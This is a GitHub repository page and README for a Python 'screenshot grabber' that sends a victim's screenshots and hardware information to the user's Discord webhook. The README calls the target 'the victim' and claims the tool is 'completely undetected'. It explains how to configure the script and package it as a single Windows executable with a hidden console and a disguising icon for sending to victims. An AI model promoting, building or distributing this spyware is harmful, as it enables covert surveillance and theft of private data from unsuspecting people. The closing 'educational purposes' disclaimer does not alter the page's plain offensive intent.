Skip to content

A Simple PC Screenshot Grabber connected to your Discord Webhook (2024)

Notifications You must be signed in to change notification settings

asisamko/Screenshot-Grabber-Webhook

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 

Repository files navigation

Simple Screenshot Grabber

A simple Screenshot Grabber for Discord Webhook written in Python. 📸

👀 Features

  • ✅ Customizable Webhook address and name
  • ✅ Shows Screenshot and Hardware info directly in the webhook
  • ✅ Completly undetected
  • ✅ Simple to use
  • 📍 After config you have to convert the python file to .exe manually with auto-py-to-exe (Tutorial below)

📸 Webhook preview

App Screenshot

👁️ Download and Usage

  • Create a Discord Webhook on your server and copy the address

  • Download the script with Terminal

  git clone https://github.com/asisamko/Screenshot-Grabber-Webhook.git

or normally download the ZIP file from Code > Download ZIP

  • Open up the folder with the script
  • Install dependencies
  pip install -r requirements.txt
  • 🚩 Open the grabber.py in a Text Editor Notepad or better VSC and edit the Webhook address and the name
  • 🚩 I recommend you to convert the script to .exe before sending it to the victim (Tutorial below)

💾 How to Convert

  • Install auto-py-to-exe with pip
  pip install auto-py-to-exe pyinstaller
  • Build the executable file (opens GUI)
auto-py-to-exe

⚙️ How to config the .EXE

  • Select the path to the grabber.py
  • Select ONEFILE option! (--onefile)
  • Select Hide the console (--windowed)
  • Select an icon (must be .ICO) (--icon)
  • In advanced input .exe file name (--name)
  • Hit the Convert Button! THAT'S ALL

You should get an executable file (.exe) that you can send to the victim. ✅

Thanks for using/editing my script. 😉

For educational purposes only! ⛔

Releases

No releases published

Languages